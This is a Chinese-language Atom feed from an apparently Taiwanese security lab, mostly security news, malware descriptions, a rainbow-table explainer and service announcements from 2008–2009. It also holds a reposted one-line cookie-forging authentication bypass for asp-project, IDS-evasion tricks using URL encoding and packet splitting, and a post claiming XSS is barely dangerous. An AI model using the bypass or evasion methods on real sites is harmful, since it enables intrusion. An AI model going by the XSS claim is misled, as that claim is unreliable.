<![CDATA[Dchsoft-資訊安全實驗室]]>http://safe.dchsoft.com.tw/IIFUN ATOM Maker2009-03-09T18:20:41+08:00 <![CDATA[SQL Injection 入侵監視器 畫面放出]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2009-03-09T00:00:00+08:00 2009-03-09T00:00:00+08:00
她可以監視,查看,記錄嘗試SQL Injection入侵的IP以及時間,也就是做到IIS入侵檢測記錄或者說是網站入侵檢測記錄,可以協助MIS進行採集蒐

]]> http://safe.dchsoft.com/content/new/newcont16.html <![CDATA[Dchsoft提供網站安全空間]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2009-02-15T00:00:00+08:00 2009-02-15T00:00:00+08:00 在您進入這個空間之前
我們會提供資訊安全檢測
以及漏洞修補的工作
使得您的網站在進入我們空間之後是屬於安全的狀態
另外會加設入侵監視器 來幫助監視 是否有人嘗試 入侵 您的網站

另外我們提供每天的資料備份 支援隨時復原
]]> http://safe.dchsoft.com/content/new/newcont15.html <![CDATA[Conficker蠕蟲釀重災 微軟懸賞25萬美元緝兇]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2009-02-14T00:00:00+08:00 2009-02-14T00:00:00+08:00 微軟在去年10月針對其Server service發布MS08-067安全更新修補一漏洞,但是駭客已鎖定此漏洞持續散布蠕蟲病毒,平均每日有50萬台電腦感染到這隻代碼為Conficker的W32.Downadup.A蠕蟲,每日有超過170萬台電腦受到攻擊,累積到今年1月中旬,已有超過9百萬台電腦傳出災情!遏止災情持續擴大,微軟12日宣布,如果提供線索讓散播這種電腦蠕蟲者因爾遭到逮捕並被定罪的人,將致贈賞金25萬美元。




在這一波嚴重的網路毒災中,微軟最先發現的是一隻名為Win32/Conficker.A的蠕蟲,大多散布在企業內部,後來家庭用戶也開始傳出災情,此蠕蟲會隨機攻擊網路上的電腦,當受到攻擊時,該電腦即會下載蠕蟲的複本,並偽裝為JPG檔案以及儲存在系統內的DLL檔案匣中,並自動修補系統記憶體中的API漏洞,以確定這台電腦不會被其他駭客掌控。今年1月,微軟更發現了Conficker蠕蟲的變種Win32/Conficker.B,會自動破解網路分享密碼,將惡意程式複製到網路分享資料夾,並進一步感染其他使用者。




微軟同時也組成專業調查團隊繼續追蹤調查,微軟正與ICANN、VeriSign、AOL、Symantec、F-Secure、ISC、M1D Global、Public Internet Registry及Global Domains International等合作,追蹤釋毒的黑手元兇。




ICANN首席網路安全顧問拉特瑞(Greg Rattray)認為,要想擊敗Conficker或Downadup之類的殭屍電腦網路攻擊,最好的辦法是電腦安全社群及網域名稱系統社群攜手合作。




根據IDG引述Hostexploit編輯評論指出,通常撰寫一隻病毒所得的報酬為1萬美元,25萬美元的高額獎金具有讓駭客圈窩裡反的效果,在此之前,微軟抓到Sasser、Blaster與Sobig蠕蟲的作者,消息便是來自作者的友人所密報。而目前估計,全球微軟電腦用戶已傳出Conficker災情的國家,包括台灣、美國、德國、西班牙、法國、義大利、中國及日本等。

本則新聞由NOWnews提供 2009/02/14
]]> http://safe.dchsoft.com/content/new/newcont14.html <![CDATA[恭喜即日起提供免費網站資安檢測]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2009-02-11T00:00:00+08:00 2009-02-11T00:00:00+08:00 為了迎接寒冷的2009年,即日起Dchsoft提供免費的網站資訊安全檢測.
為網站安全貢獻一份心力
名額有限,請速報名!]]> http://safe.dchsoft.com/content/new/newcont13.html <![CDATA[恭喜 SQL Injection 檢測工具開始開放索取]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2009-01-31T00:00:00+08:00 2009-01-31T00:00:00+08:00 數量有限 動作要快喔~

另外推出 免費SQL Injection測試

請來信洽詢]]> http://safe.dchsoft.com/content/new/newcont11.html <![CDATA[微軟發最終版IE 8]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2009-01-31T00:00:00+08:00 2009-01-31T00:00:00+08:00
  IE 8的新功能之一是一種名為“InPrivate”的流覽模式。這種流覽模式能夠不留下使用者PC的指紋。微軟希望利用IE 8新增加的功能奪回在流覽器市場失去的市場份額。IE 8新增加功能包括隱私流覽、改善的安全和名為加速器的新型外掛程式。

  在安全方面,微軟增加了跨站腳本篩檢程式並且增加了防禦“點擊劫持”攻擊的功能。

  微軟IE部門總經理Dean Hachamovitch在接受採訪時表示,這個候選發佈版和最終版本幾乎沒有區別,不過,他不願意說這個最終版本將在什麼時間發佈。

  IE 8將相容Windows XP和Vista。新版本的IE 8將建在Windows 7作業系統中。

  微軟在聲明中稱,Windows 7能夠實現IE 8的一些獨特的功能,其中包括一些“Touch and Jump”清單,這些清單需要進行額外的測試以保證向用戶提供最佳的Windows體驗。微軟將隨著Windows 7開發週期的進展繼續更新IE的版本。
]]> http://safe.dchsoft.com/content/new/newcont12.html <![CDATA[瀏覽器出現嚴重安全漏洞 微軟緊急更新]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-12-18T00:00:00+08:00 2008-12-18T00:00:00+08:00
(法新社華盛頓州雷孟17日電) 美國微軟公司(Microsoft Corp.)今天採取罕見作為,針對出現嚴重安全漏洞的網路瀏覽器(Internet Explorer)軟體,緊急發布修補程式,否則數百萬部電腦用戶恐將遭到駭客入侵。


上週被發現的這項安全漏洞,將使電腦容易遭到零時差(zero-day)攻擊,駭客只要引導他人去瀏覽植入病毒的網站,便可掌控他人電腦。瀏覽器使用者不需下載任何東西,電腦就會中毒。微軟公司的網路瀏覽器是全球使用最為普遍的網路瀏覽器。


微軟公司表示,它計畫在今天推出等級列為「重大」的安全更新。使用者電腦上的微軟更新功能只要啟動,便會自動獲得修補程式。


駭客已經利用這項漏洞,將惡意程式碼上傳至數千個網站,而如果瀏覽網站的人剛好使用微軟公司的網路瀏覽器,也沒有依照微軟公司先前的建議,採取一系列緊急措施,惡意程式碼便將自動侵入瀏覽者的電腦。


微軟公司指出,目前只看到駭客集中攻擊安全漏洞只出現在使用最普遍的IE 7.0版本,但微軟也警告,該公司其他所有的瀏覽器版本也相當容易受害。


微軟公司很少會在軟體的每月定期更新以外,發布安全更新。微軟公司上次臨時發布更新是在10月,前一次則是一年半以前。
]]> http://safe.dchsoft.com/content/new/newcont10.html <![CDATA[微軟發布11月安全公告 籲使用者下載補充程式]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-11-13T00:00:00+08:00 2008-11-13T00:00:00+08:00
在日前發現駭客在網路上密集流傳攻擊程式碼,可能發動大規模攻擊後,台灣微軟已發布安全更新,提醒使用者做好安全防護,並告知合作的資訊安全廠商,協同建立防護機制後,台灣微軟12日發布11月份安全公告,再度提醒企業客戶與消費者,為保護電腦系統的資訊安全,應定期下載內容為編號MS08-068、MS08-069共2個新的安全性補充程式。

台灣微軟說,由於所發現Microsoft可能被攻擊的弱點,會造成有心人士藉由此弱點執行遠端程式碼、提高權限及資訊洩漏的問題,因此該公司已開始積極聯絡相關客戶及合作夥伴,敦促他們立即部署MS08-068、MS08-069補充程式,將可能對客戶造成的不利影響降至最低。

另外,微軟也於Windows Server Update Services (WSUS)、Windows Update(WU)及下載中心發行新版的 Microsoft Windows 惡意軟體移除工具。微軟提醒使用者注意,此工具將不會經由 Software Update Services (SUS) 散發。

本則新聞由NOWnews提供 2008/11/13
]]> http://safe.dchsoft.com/content/new/newcont9.html <![CDATA[灰鴿子變種IF(Backdoor.Win32.Gpigeon2008.if)病毒]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-11-03T00:00:00+08:00 2008-11-03T00:00:00+08:00


--------------------------------------------------------------------------------

  據瑞星全球反病毒監測網介紹,今日(2008年11月2日)有一個病毒特別值得注意,它是:“灰鴿子變種IF(Backdoor.Win32.Gpigeon2008.if)”病毒。該病毒通過網路傳播,病毒會偷竊使用者隱私資訊,還可能遠端控制使用者電腦,給使用者電腦安全帶來極大危害。

  本日熱門病毒:

  “灰鴿子變種IF(Backdoor.Win32.Gpigeon2008.if)”病毒:警惕程度★★★,後門病毒,通過網路傳播,依賴系統:Windows NT/2000/XP/2003。

  該病毒運行時會首先將自身拷貝到系統目錄下,並設置成隱藏、系統、唯讀屬性。然後病毒會創建系統服務,實現隨系統自啟動。它還會新建IE進程並設置該進程為隱藏,然後將病毒自身插入該進程中。通過在後臺記錄使用者鍵盤操作,病毒會偷取使用者資訊和本地系統資訊等,並將該資訊發送給駭客。如此使用者電腦將被遠端控制,不自主地刪除檔,遠程下載上傳檔,修改註冊表等等,給使用者的電腦和隱私安全帶來很大隱患。

  反病毒專家建議電腦使用者採取以下措施預防該病毒:

  1、建立良好的安全習慣,不打開可疑郵件和可疑網站;

  2、很多病毒利用漏洞傳播,一定要及時給系統打補丁;

  3、安裝專業的防毒軟體升級到最新版本,並打開即時監控程序;

  4、為本機管理員帳號設置較為複雜的密碼,預防病毒通過密碼猜測進行傳播;

  5、打開防護中心開啟全部防護,防止病毒通過IE漏洞等侵入電腦。
]]> http://safe.dchsoft.com/content/new/newcont8.html <![CDATA[EditPlus查找PHP源碼簡單數字型注入的規則運算式]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-09-13T00:00:00+08:00 2008-09-13T00:00:00+08:00
  1.查找select、update、delete語句

  ((select|SELECT|update|UPDATE|delete|DELETE)+.*(from|FROM|set|SET)+.*(where|WHERE)+.*)

  查詢語句,對於沒有條件判斷的基本不存在注入問題,因而僅搜索此語句即可

  例子:

  select * from user where

  2.簡單的數字型注入

  ((select|SELECT|update|UPDATE|delete|DELETE)+.*(from|FROM|set|SET)+.*(where|WHERE)+.*=[ ]?["]?["]?\$)

  能找到select、update delete三種語句,5種格式的整形注入,如:

  直接變數傳入

  select * from guess where id=$subject_id

  update guess set is_valid=0 where id=$subject_id

  delete from guess where id=$subject_id

  =與變數之間存在空格

  select * from guess where id= $subject_id

  update guess set is_valid=0 where id= $subject_id

  delete from guess where id= $subject_id

  變數雙引號

  select * from guess where id="$subject_id"

  update guess set is_valid=0 where id="$subject_id"

  delete from guess where id="$subject_id"

  =與雙引號之間存在空格

  select * from guess where id= "$subject_id"

  update guess set is_valid=0 where id= "$subject_id"

  delete from guess where id= "$subject_id"

  =與引號、雙引號之間存在空格

  select * from guess where id= " $subject_id"

  update guess set is_valid=0 where id= " $subject_id"

  delete from guess where id= " $subject_id"

  其實自己發現其他的一些漏洞也可以找到相應關鍵字尋找的,當然這些僅限於比較容易看出來的漏洞了,^_^。
]]> http://safe.dchsoft.com/content/new/newcont7.html <![CDATA[駭客開始嘗試攻擊DNS漏洞]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-09-06T00:00:00+08:00 2008-09-06T00:00:00+08:00
根據英國科技媒體vnunet.net在上周六(7/26)報導,已有駭客嘗試攻擊日前被洩露技術細節的|link|DNS|link|漏洞。

Vnunet引述署名為James Kosin的Linux使用者在郵件論壇中所發表的文章,該文章張貼了在上周所蒐集的攻擊紀錄,顯示已有駭客嘗試利用此一|link|DNS|link|漏洞入侵涵蓋Gmail、Hotmail、Yahoo、eBay及Facebook等伺服器。

駭客集團甫於上周發表了|link|DNS|link|攻擊程式模組,當時即有資安研究人員警告必須防範可能隨之而來的攻擊行動。

該|link|DNS|link|漏洞於今年初被發現,業者在今年7月初大舉進行同步更新。根據發現該漏洞的IOAcitve研究人員Dan Kaminsky表示,在修補程式剛出爐的時候,約有86%的|link|DNS|link|伺服器是含有漏洞的,但最新的數據顯示,仍有52%的|link|DNS|link|伺服器含有漏洞。

此一|link|DNS|link|漏洞可讓駭客進行快取下毒攻擊,將合法的網址轉向偽造的網站,以竊取使用者的個人資訊。

先前有兩名安全研究人員早Kaminsky一步猜測並公布漏洞存在的原因,才讓攻擊程式模組開始在網路上流竄,上周Kaminsky亦在自己的部落格中揭露標準快取下毒的攻擊手法以及更多相關漏洞的細節。(編譯/陳曉莉)]]> http://safe.dchsoft.com/content/new/newcont5.html <![CDATA[揭秘美國最大駭客盜竊案]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-09-06T00:00:00+08:00 2008-09-06T00:00:00+08:00   1.攻擊者是如何具體入侵無線網路的?
  要入侵無線網路,駭客需要打破無線網路的WEP加密。這種加密協議存在缺陷,很容易被攻破,進而進入受保護的網路。
  美國波士頓的聯邦檢察官邁克爾沙利文表示,一旦進入網路內部,那三個安裝好的“嗅探器”程式就會在零售商的卡處理網路中到處嗅探,捕獲信用卡號碼、密碼和帳號資訊。還有一些其他私人號碼可以幫助他們訪問已經簽發並且啟動了的信用卡和借記卡。
  2.整個事件中入侵者都利用了哪些漏洞,採用了哪些入侵手段?
  駭客使用的是一種廣為流行並且普遍適用的技術,即通過前端資料隱碼入侵獲取訪問數據 庫。這直接通過一個公眾所面臨的介面(HTTP)執行,並且依賴于利用貫穿網路層到後端系統的數據查詢。在這種情況下,這是管理方面的問題——這是一個廣 泛、普遍存在的問題,應該一直嚴肅對待。
  服務器系統可能遇到各式各樣的攻擊,一旦被入侵,客戶的數據資料確實可能處於危險之中。典型的案例包括通過 “被迫式”下載來自動安裝惡意軟體。
  “被迫式”下載往往發生在用戶訪問一個有漏洞的網頁的時候,它將從網頁流覽器中找到沒有打更新的漏洞進而安裝惡意程式碼。當然這並不一定發生在服務器上,它可能發生在作為與關鍵系統處於同網路的客戶系統上。惡意軟體(木馬)往往從那裡散播到整個網路。
  然而,在這種情況下,確保無線網路的安全看起來是一個簡單的問題。沒有採用“零日” 攻擊,而是利用一種眾所周知的具有無線加密協議的安全問題。通過使用加密技術如WEP或者更強有力的機制如WPA、WPA2可以保護大部分無線網路的安 全。據說WEP擁有各種安全性缺陷,其加密協議很容易被破解從而進入該無線網路。無線網路不應該允許訪問敏感數據的。基於這些原因,一個相對容易的安全漏 洞出現。我們所提及的嗅探器程式是一種後門木馬,它們是一種可以搜集並傳遞資訊的惡意程式碼,也是當今網路犯罪很受歡迎的駭客工具。
  3.為什麼這麼長時間才破獲這個案件?
  據CNN報導,調查開始於2006年年底,除了司法部門,密情局通過美國在聖地牙哥聯邦調查局進行了三年多的秘密調查。
  司法部在一個聲明中表示,駭客當時隱藏了他們控制的位於美國和東歐的在加密電腦服 務器上的數據。一些信用卡和借記卡的號碼通過互聯網出售給其他人,然後將信用卡號加密存儲於空白卡來取現金。通過在空白卡的磁條上加密“兌現”。當局聲 稱,被告然後用這些卡每次在ATM取款機上提取數萬美元。花了這麼長時間是因為調查這些事件十分複雜,在各個地區牽扯到許多因素。不同國家針對加密儲存數 據的法律不同,導致了調查加密數據存儲只會拖延調查的進程。
  4.是攻擊者技術手段很高,沒有讓任何一方察覺,還是其他原因?
  這存在兩個主要問題。
  第一個是關於最初的安全漏洞:在防護無線網路和數據的時候,用簡單的手段保護無線網路的防護協議非常脆弱。很容易通過無線網路獲得敏感資訊,這是設計和拓撲佈局的問題。
  第二個問題是關於惡意後門木馬程式在網路上的蓬勃發展,並且搜集了大量的資訊用於惡 意目的。這些木馬程式常常被疏忽。通過部署適當的安全系統,最初的漏洞不會再發生。當一個漏洞出現,一個惡意的內部人員進入網路,綜合安全系統各個功能應該會阻止這些木馬:反病毒就是一個很好的例子。
  網路安全的一系列發展正導致一個綜合解決方案的出現,從而使網路能夠伸縮自如以抵禦絕大部分攻擊。這個解決方案的關鍵元件正在由產品廠商推出,被稱之謂UTM,或統一威脅管理系統。
  促使內部網路安全成為危機點的兩個主要因素是:
  (1)網路犯罪:隨著犯罪分子在身份盜竊與勒索方面越來越成熟,他們所涉及的網路範圍也越來越大。現在,他們把目標鎖定在提供豐富機會的特定公司和網站,因為它們可以帶來有價值的交易或者儲備了大量個人資訊如信用卡和銀行帳戶的數據庫。
  (2)懷有惡意的內部人員:對於一般終端使用者可使用的入侵、掃描和開發網路資源的工具和技術的數量不斷劇增。隨著時間的推移,那些導致資訊或者業務資源真正丟失的內部人員事件將會增加。為了保護組織免受來自這些方面的攻擊,局域網接入點必須看作是一個安全周界。
  5. 國內企業應該採取哪些防範措施?
  •無線網路不能訪問關鍵數據,並且採用更為強大的加密演算法(非WEP協定)。
  •通過封包分析(入侵防禦系統)防禦資料隱碼入侵。
  •通過入侵防禦系統防禦漏洞利用(惡意下載,服務攻擊)。
  •通過反垃圾郵件、反病毒和網頁過濾(有惡意漏洞利用的網址或其它惡意軟體)防禦網路釣魚類攻擊。
  •通過防火牆政策保護來自不可信任來源未被授權的埠訪問。
  •通過為軟體提供最新更新和更新防範成功的漏洞攻擊。
  •通過反病毒軟體防禦在網路上氾濫並危及敏感資訊的惡意程式碼。
  6. 特殊時期(如奧運期間)哪些安全措施尤為重要?
  公司IT管理人員應該為員工推薦以下培訓:
  • 決不要打開協力廠商建議的、未經請求的連結——取而代之的是,打開你的流覽器輸入你想要訪問的網址URL。
  •升級安全解決方案——適當擁有一個有效的反垃圾郵件、網頁過濾和防病毒的解決方案,並且確保持續更新。
  •“點擊之前,請選擇”——用幾秒鐘的時間看一下你打算點擊的連結,始終要有意識,注意那些企圖通過使用錯誤拼寫或者古怪的子功能變數名稱使之看似合法的連結。
  •保護隱私——永遠不要應協力廠商的請求洩露個人資訊,如銀行帳號、信用卡或者密碼。
  •瞭解你的供應商——當使用個人資訊來進行線上交易的時候,確保供應商是一個可信任的來源而且交易是通過一個安全的連接進行的。
  •關鍵問題培訓——員工應該清楚瞭解安全風險,尤其在加強警戒階段,推薦通過簡單的培訓來防禦社會工程攻擊。
  •更新、更新、更新——所有的軟體,尤其是流覽器和作業系統,應該獲取最新的更新(更新)。這將確保網頁漏洞被關閉,使遠端攻擊者不能利用已知的漏洞。]]> http://safe.dchsoft.com/content/new/newcont6.html <![CDATA[Security風險管理之C-I-A]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-08-21T00:00:00+08:00 2008-08-21T00:00:00+08:00 C-I-A Triad <- Risk Management

Confidentiality(機密性)
如軍方、政府部門

Integrity(完整性)
如:銀行
ps:多個0可能你很hi可是銀行並不會很hi

Availability(可用性)
如:入口網站
ps:如果都被dos了那它怎麽運行呢?
例如yahXX哦號稱一秒損失N萬的說

其實在開始Risk Management的時候需先選擇出 那個是比較優先重要的
當然全部都很重要自是要表示出優先級,這樣在遇到問題的時候不會避重就輕。

Risk Management還有一個公式

Risk= A/C*T/C*V/C

A is Assetvalue 資產價值

T is Threat 威脅來源

V is Vulnerability 弱點

C=Critica 嚴重性 (最嚴重為5)

]]> http://safe.dchsoft.com/content/new/newcont4.html <![CDATA[XSS危害到底有多大?]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-08-18T00:00:00+08:00 2008-08-18T00:00:00+08:00 個人認為XSS成功運行的條件比起sql injection成功運行的條件還要高 所以導致真正要實現是很麻煩的
怎麼說 我們看下 下列比較表,當你看完之後你會發現XSS根本沒在怕的
漏洞 Xss SQL Injection
需讀取資料庫 YES YES
需可以寫入資料庫 YES NO
需有一只免殺木馬(可選擇)
PS:假如你要掛得到後端密碼 以及路經
YES NO
需規避Firewall(可選擇)
PS:假如你要掛得到後端密碼 以及路經
YES NO

基本上SQL 都不會用SA.但是他對於控制網站 然後掛ASP木馬已經搓搓有餘
可是XSS就......就第二點來說 就很難實現
當然可以2者結合.達到超強破壞力.可是我們這裡討論的是說.單個漏洞的危害....so so 你還會怕嗎?

]]> http://safe.dchsoft.com/content/new/newcont3.html <![CDATA[Rainbow Hash Table 與密碼破解]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-07-23T00:00:00+08:00 2008-07-23T00:00:00+08:00 跨平台密碼破解器Ophcrack的破解速度簡直是不可思議。到底有多快呢?它能在160秒內破解『Fgpyyih804423』這個密碼。很多人都認為這個密碼已經相當安全了,例如微軟的密碼強度檢查工具認為該密碼的安全級別是“強”;而Geekwisdom密碼強度測量工具認為該密碼的安全強度是“普通”。

Ophcrack的破解速度為什麼會這麼快呢?這是因為它使用了Rainbow Tables,我說的可不是天上的那種彩虹。

不過,Rainbow Tables也是很美的。

要想理解Rainbow Tables的工作原理,首先你得明白電腦是如何儲存密碼的,不管是在你自己用的桌上型電腦還是在遠端的網路伺服器那裡。

一般而言,密碼決不會儲存在純文字檔案中。至少我們不應該這麼做,除非你用的是世界上最幼稚的程式,而且你的目的就是構建世界上最不安全的系統。實際上,我們應當用雜湊(Hash)函數的輸出值來儲存密碼。雜湊是不可逆(單向)運算,即使攻擊者能夠讀取密碼的雜湊表,他也不可能僅僅透過那個雜湊表來重建密碼。

但是攻擊者可以用Rainbow Hash Tables來攻擊密碼的雜湊表:透過龐大的、針對各種可能的字母組合,預先計算好其雜湊值。雖然攻擊者也可以即時計算雜湊值,但是利用這個預先算好的龐大雜湊表,顯然能夠使攻擊的速度快上無數倍——假設攻擊機器有足夠的記憶體來載入整個表格(或至少是大部分),這就是個很典型的時間-記憶體取捨問題(time-memory trade-off),尤其是駭客更傾向於使用這種捷徑。

Rainbow Tables有多龐大呢?Ophcrack的預設安裝畫面會讓你有個大致上的概念:

產生這些龐大的Rainbow Tables需要花很長時間,但是一旦完成,每個發動攻擊的電腦破解密碼能力都將大幅增強。

現有最小Rainbow Tables涵蓋了最基本的英文字母及數字,光這樣它的大小就有388MB。這是Ophcrack開機光碟預設使用的雜湊表。但即使這個最小的表格也具有相當的效力。我曾用它來攻擊一個Windows XP虛擬機器上的密碼,結果如下:

能找到?花費秒數
Password1!700
Fgpyyih804423yes159
Fgpyyih80442 percent 700
saMejus9yes140
thequickbrownfoxjumpsoverthelazydog700

當然,用這種最小的Rainbow Tables無法破解那種帶有特殊字元的密碼(比如 percent &^$#),因為表格裡根本沒有包含這些字元。你可能也注意到了那些passphrase(我特別鍾愛使用它們),由於本身的長度關係,passphrase對此項技術是免疫的。但是,話又說回來了,該攻擊可以在11分鐘內破解所有14位元數字及英文字密碼組合中的99.9 percent ,這還是用了最小的Rainbow Tables。表格越大、越完整,攻擊破解能力越強。Ophcrack檔案描述了它所能使用的Rainbow Tables之間的差異:

數字及英文字母表格(10k) 388MB 包含所有英文字母及數字混合密碼中99.9 percent 的LanManager表,由於LanManager會將密碼拆成兩組7個字元的設計,長度1~14個字的密碼都可以用這個表格破解,而且LanManager的雜湊不分大小寫,這個表格中所含的800億個雜湊值可用以破解2的83次方種密碼組合)。

數字及英文字母表格(5k) 720MB 包含所有英文字母及數字組合的密碼中99.9 percent 的LanManager表。但是,由於表格變成2倍大,如果你的電腦有1GB以上的記憶體空間的話,它的破解速度是前一個的4倍。

延伸表格 7.5GB 包含最長14個大小寫字母、數字以及下列33個特殊字元(!"#$ percent &'()*+,-./:;<=>?@[\]^_`{|} ~)組成的LanManager雜湊表中的96 percent 密碼。該表格中大約有7兆種的組合,可以涵蓋5*10的12次方(或2的92次方)種密碼。

NT 8.5 GB 當LanManager雜湊被停用時,我們可以使用此表格來破解電腦上的NT雜湊表。該表包含了以下組合中的90 percent 密碼:
•長度1~6,由大小寫字母、數字以及33個特殊字元組合的密碼
•長度為7,由大小寫字母及數字組成的密碼
•長度為8,由小寫字母及數字組成的密碼

該表格包含7兆種組合,亦對應7兆種密碼(NT雜湊表不存在LanManager雜湊表的弱點)。

需要注意的是,所有這些Rainbow Tables都有其特定適用的密碼長度和字母組合。太長的密碼,或者用了表格中沒有的字元,那麼用Rainbow Tables就無法破解。

不幸的是,由於舊式LanManager雜湊表不可原諒的缺點,Windows伺服器特別容易被Rainbow Tables攻擊。令我吃驚的是,Windows Server 2003在預設狀態下竟然還支援那些舊式Lan Manager雜湊表。我強烈建議大家停用Lan Manager雜湊表,尤其是在那些儲存所有使用者認證的伺服器上(如 DC)。雖然這將對你的Windows 98使用者造成很大的不便,但是我覺得為了提高安全性,這麼做是值得的。

我聽說明年發佈的Windows Server 2008會將LanManager雜湊表去掉。Windows Vista已經不支援持這些過時的雜湊表了。在Vista系統中執行OphCrack的話結果請看下列對話方塊:

All LM hashes are empty. Please use NT hash tables to crack the remaining hashes.

對某些人而言,Ophcrack可能彈性不足,像是它不允許你自己產生Rainbow Tables,因此,你得用Project Rainbow Crack,該工具能用來破解幾乎所有字母組合以及任何雜湊演算法。但你得當心,Rainbow Tables攻擊最近才盛行的原因是由於電腦的2~4GB記憶體最近才降到了讓人能接受的價格。我想說的是這些表格很龐大,對於攻擊安全性更高的NT雜湊表所需的Rainbow Tables大小如下:

字元集長度表格大小
ABCDEFGHIJKLMNOPQRSTUVWXYZ
14
0.6 GB
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
14
3 GB
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$ percent ^&*()-_+=
14
24 GB
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
!@#$ percent ^&*()-_+=~`[]{}|\:;"'<>,.?/
14
64 GB
用Rainbow Tables對付桌上型電腦有點殺雞用牛刀,如果駭客能接觸實體主機,那麼就沒有任何安全性可言了,這是不變的10項電腦安全法則中的第3條。一旦駭客可以存取實體主機,那麼他可以用很多工具來重設密碼。

但是如果駭客從遠端伺服器或資料庫獲得大量密碼雜湊表,我們就有麻煩了,這種情況下,遭受Rainbow Tables攻擊的風險非常大。因此你決不能只依靠雜湊技術——你必須給雜湊表加些花樣(Salting),這樣得到的雜湊值就與眾不同了。給雜湊表加花樣,聽起來很複雜,但其實很簡單。在產生雜湊表之前,給密碼加個唯一的值即可:

hash = md5('deliciously-salty-' + password)

這樣,攻擊者就無法用Rainbow Tables來攻擊你了——“密碼”和“deliciously-salty”產生的雜湊結果是不匹配的。除非駭客能知道你所選用的值,即使真的知道,他也得專門針對你的機器產生一個專屬的Rainbow Tables。(編輯:資安之眼)

]]> http://safe.dchsoft.com/content/new/newcont1.html <![CDATA[防毒軟體業:駭客特殊時機將發動社交攻擊]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-07-23T00:00:00+08:00 2008-07-23T00:00:00+08:00
趨勢科技資深技術顧問戴燊歸納近期網路攻擊模式後,對未來6個月提出4大預測,包括社交工程仍為重要攻擊手法之一、鎖定新發現的軟體漏洞、垃圾郵件數量續呈倍數成長、垃圾郵件與網路釣魚將繼續其混合式威脅等。

他表示,預料網路犯罪者將利用特殊時機來發動攻擊,如2008年奧運、開學熱潮、美國總統大選、足球與美式橄欖球比賽,以及每年12月的年終購物季。

而網路犯罪者也將繼續鎖定新發現的協力廠商軟體漏洞,如QuickTime、RealPlayer、Adobe Flash等。

同時,垃圾郵件數量將持續呈倍數成長,預料每日平均垃圾郵件數量總數將增加300至500億封。而在開學熱潮、奧運等因素影響下,垃圾郵件與網路釣魚數量在今年8月將會增加。加上年終購物季的關係,11月也會增加,預計將增至每天1700億至1800億封。

另一方面,垃圾郵件與網路釣魚將繼續在混合式威脅中扮演重要角色,估約0.2 percent 網頁(每500個就有1個)將被植入惡意掛碼,使用者進入網頁將遭感染。

(轉中央社)]]> http://safe.dchsoft.com/content/new/newcont2.html <![CDATA[ASP不安全Cookie漏洞]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2009-01-31T00:00:00+08:00 2009-01-31T00:00:00+08:00 asp-project 1.0 Insecure Cookie Method Vulnerability


作者:milw0rm 文章來源:milw0rm
#####################################################################################
#### Asp-project Cookie Handling ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : http://ircrash.com #
#My Official WebSite : http://r3dw0rm.ir #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#Download : http://www.sourceforge.net/projects/asp-project #
# #
#Dork : :( #
# #
#####################################################################################
# [Bug] #
# #
#javascript:document.cookie = "crypt=1; path=/"; #
# #
###################################### TNX GOD ######################################

# milw0rm.com

]]> http://safe.dchsoft.com/content/client/client.html?id=12 <![CDATA[分析入侵偵測系統漏洞]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2009-01-31T00:00:00+08:00 2009-01-31T00:00:00+08:00   一、識別方式的設計漏洞
  1.對比已知攻擊手法與入侵偵測系統監視到的在網上出現的字串,是大部分網路入侵偵測系統都會採取的一種方式。例如,在早期Apache Web伺服器版本上的phf CGI程式,就是過去常被駭客用來讀取伺服器系統上的密碼檔(/etc/password),或讓伺服器為其執行任意指令的工具之一。當駭客利用這種工具時,在其URL request請求中多數就會出現類似“GET /cgi-bin/phf?.....”的字串。因此許多入侵偵測系統就會直接對比所有的URL request 中是否出現/cgi-bin/phf 的字串,以此判斷是否出現phf 的攻擊行為。
  2.這樣的檢查方式,雖然適用於各種不同的入侵偵測系統,但那些不同的入侵偵測系統,因設計思想不同,採用的對比方式也會有所不同。有的入侵偵測系統僅能進行單純的字串對比,有的則能進行詳細的TCP Session重建及檢查工作。這兩種設計方式,一個考慮了效能,一個則考慮了識別能力。攻擊者在進行攻擊時,為避免被入侵偵測系統發現其行為,可能會採取一些規避手法,以隱藏其意圖。例如:攻擊者會將URL中的字元編碼成%XX 的警惕6進值,此時“cgi-bin”就會變成“%63%67%69%2d%62%69%6e”,單純的字串對比就會忽略掉這串編碼值。
  內部代表的意義。攻擊者也可以通過目錄結構的特性,隱藏其真正的意圖,例如:在目錄結構中,“./”代表本目錄,“../”代表上層目錄,Web伺服器 可能會將“/cgi-bin/././phf”、“//cgi-bin//phf”、“/cgi-bin/blah/../phf?”這些URL request均解析成“/cgi-bin/phf”,但單純的入侵偵測系統可能只會判斷這些request是否包含“/cgi-bin/phf”的字串,而沒有發現其背後所代表的意義。
  3.將整個request在同一個TCP Session中切割成多個僅內含幾個字元的小Packet,網路入侵偵測若沒將整個TCP session重建,則入侵偵測系統將僅能看到類似“GET”、“/cg”、“i”、“-bin”、“/phf”的個別Packet,而不能發現重組回來的結果,因為它僅單純地檢查個別Packet是否出現類似攻擊的字串。類似的規避方式還有IP Fragmentation Overlap、TCP Overlap 等各種較複雜的欺瞞手法。
